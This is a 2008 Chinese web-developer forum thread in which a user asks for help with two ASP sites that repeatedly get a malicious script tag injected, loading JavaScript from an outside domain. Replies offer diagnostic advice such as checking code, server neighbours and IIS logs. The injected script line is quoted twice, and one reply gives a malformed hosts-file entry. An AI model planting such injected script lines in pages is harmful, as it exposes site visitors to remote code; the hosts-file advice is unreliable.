28,391
社区成员
发帖
与我相关
我的任务
分享网站被攻击的问题
有2个网站 老是被攻击被插入代码
<script language="javascript" src="http://conn.ch.ma/click.js?id=15&evx=52591"></script>
烦死了,都是同一种,我查了注入也没查出什么来,网上有扫描SQL注射与XSS攻击的牛B工具我也用了,进行扫描也没扫出问题来
再用ASPSecurity v1.6 SP2也没有发现问题就是木马文件,但是老被挂上那个字符窜
我把admin的表改为admin0 username password 分别都改为其他字符了,还是被干掉了
我现在不知道从哪里入手了,请高手指点了
<script language="javascript" src="http://conn.ch.ma/click.js?id=15&evx=52591"></script>
烦死了,都是同一种,我查了注入也没查出什么来,网上有扫描SQL注射与XSS攻击的牛B工具我也用了,进行扫描也没扫出问题来
再用ASPSecurity v1.6 SP2也没有发现问题就是木马文件,但是老被挂上那个字符窜
我把admin的表改为admin0 username password 分别都改为其他字符了,还是被干掉了
我现在不知道从哪里入手了,请高手指点了
...全文
请发表友善的回复…
发表回复
jack09596 2008-08-21
- 打赏
- 举报
是啊,我重新换过了一个编辑器就OK了
gingerkang 2008-08-08
- 打赏
- 举报
代码插在什么地方了?修改了网站文件,还是篡改了数据库,还是文件数据都正常,在浏览网站的时候有时有加有时没有?
搞清楚问题,再想办法,不要跟个无头苍蝇一样,拿个所谓的工具法宝就去扫描
搞清楚问题,再想办法,不要跟个无头苍蝇一样,拿个所谓的工具法宝就去扫描
BoyHaXin 2008-08-08
- 打赏
- 举报
UP,帮顶...
CainLai 2008-08-08
- 打赏
- 举报
帮顶学习~
45Ter 2008-08-08
- 打赏
- 举报
有可能是跨站注入进去的!
自己检查下自己网站代码,然后联系下管理员,让他检查下同服务器内的其他网站是否有漏洞!
自己检查下自己网站代码,然后联系下管理员,让他检查下同服务器内的其他网站是否有漏洞!
ld2099 2008-08-08
- 打赏
- 举报
你把网址发上来,大家帮你测试看看
中木马了
1、你的站代码有漏洞或者已经在网站目录里留下文件:
认真检查你代码,认真检查ftp中所有可疑文件
2、你服务器上其他网站有漏洞,被传了木马,但是服务器没有设置好导致可以通过木马访问服务器内所有文件,于是全部中了
中木马了
1、你的站代码有漏洞或者已经在网站目录里留下文件:
认真检查你代码,认真检查ftp中所有可疑文件
2、你服务器上其他网站有漏洞,被传了木马,但是服务器没有设置好导致可以通过木马访问服务器内所有文件,于是全部中了
一把编程的菜刀 2008-08-08
- 打赏
- 举报
用工具不一定都能检查出漏洞的
jack09596 2008-08-08
- 打赏
- 举报
请教楼上的,你的意思是说服务器局域网的问题?如果服务器有问题的话,那所有网站都被插入脚本,那样的话,那个空间商也会察觉啊
不过我那2个网站都是在一个空间上.都被插入同一种代码.
不过不管怎么样,我现在就想知道,怎么查出是服务器问题还是自己网站的安全系数不够好
不过我那2个网站都是在一个空间上.都被插入同一种代码.
不过不管怎么样,我现在就想知道,怎么查出是服务器问题还是自己网站的安全系数不够好
海诗美妆 2008-08-08
- 打赏
- 举报
[Quote=引用 1 楼 icanplay2008 的回复:]
提供一个解决方法,把http://conn.ch.ma这个网址转向到本机,他就不会执行代码了。。
修改Hosts文件
用记事本打开,在最后加入
http://conn.ch.ma localhost
参考:http://baike.baidu.com/view/597330.htm
就可以了,当然了,这个只是不让他执行木马,真正的漏洞还是要找的!
[/Quote]
掩耳盗铃?
自己骗自己有什么用.
建议lz跟服务器管理员联系一下。
这条数据未必是从跑asp的主机上被插入的。
提供一个解决方法,把http://conn.ch.ma这个网址转向到本机,他就不会执行代码了。。
修改Hosts文件
用记事本打开,在最后加入
http://conn.ch.ma localhost
参考:http://baike.baidu.com/view/597330.htm
就可以了,当然了,这个只是不让他执行木马,真正的漏洞还是要找的!
[/Quote]
掩耳盗铃?
自己骗自己有什么用.
建议lz跟服务器管理员联系一下。
这条数据未必是从跑asp的主机上被插入的。
jack09596 2008-08-08
- 打赏
- 举报
怎么看出,是被注入了,还是服务器有问题呢,现在我这个还没确定,所以都不好往下结论
jack09596 2008-08-08
- 打赏
- 举报
请教楼上Hosts文件??我这里用的是人家的,是虚拟主机而已
icanplay2008 2008-08-08
- 打赏
- 举报
提供一个解决方法,把http://conn.ch.ma这个网址转向到本机,他就不会执行代码了。。
修改Hosts文件
用记事本打开,在最后加入
http://conn.ch.ma localhost
参考:http://baike.baidu.com/view/597330.htm
就可以了,当然了,这个只是不让他执行木马,真正的漏洞还是要找的!
修改Hosts文件
用记事本打开,在最后加入
http://conn.ch.ma localhost
参考:http://baike.baidu.com/view/597330.htm
就可以了,当然了,这个只是不让他执行木马,真正的漏洞还是要找的!
jhwcd 2008-08-08
- 打赏
- 举报
[Quote=引用 14 楼 jack09596 的回复:]
这个网站不是我的,我就是帮以前的朋友看的,他的网站老被攻击,叫我帮他看
[/Quote]
哦,可能是程序有漏洞,最好不IIS日志下载下来看看,具体是哪个程序有漏洞。
这个网站不是我的,我就是帮以前的朋友看的,他的网站老被攻击,叫我帮他看
[/Quote]
哦,可能是程序有漏洞,最好不IIS日志下载下来看看,具体是哪个程序有漏洞。
一把编程的菜刀 2008-08-08
- 打赏
- 举报
使用的是通用防注代码,没什么用
如果是网上的代码一般都有后门的
比如编辑器的或者上传
如果是网上的代码一般都有后门的
比如编辑器的或者上传
一把编程的菜刀 2008-08-08
- 打赏
- 举报
使用的是通用防注代码,没什么用
如果是网上的代码一般都有后门的
比如编辑器的或者上传
如果是网上的代码一般都有后门的
比如编辑器的或者上传
jack09596 2008-08-08
- 打赏
- 举报
这个网站不是我的,我就是帮以前的朋友看的,他的网站老被攻击,叫我帮他看
一把编程的菜刀 2008-08-08
- 打赏
- 举报
你用网上什么程序改的?
感觉你用的这个程序很熟悉啊
用网上的程序后门很多的
感觉你用的这个程序很熟悉啊
用网上的程序后门很多的
jack09596 2008-08-08
- 打赏
- 举报
http://www.phonetechhk.com 这个网站那个js文件不是放在数据库里面的,我替换的话,只需要替换根目录下的文件和inc下的文件就可以解决了
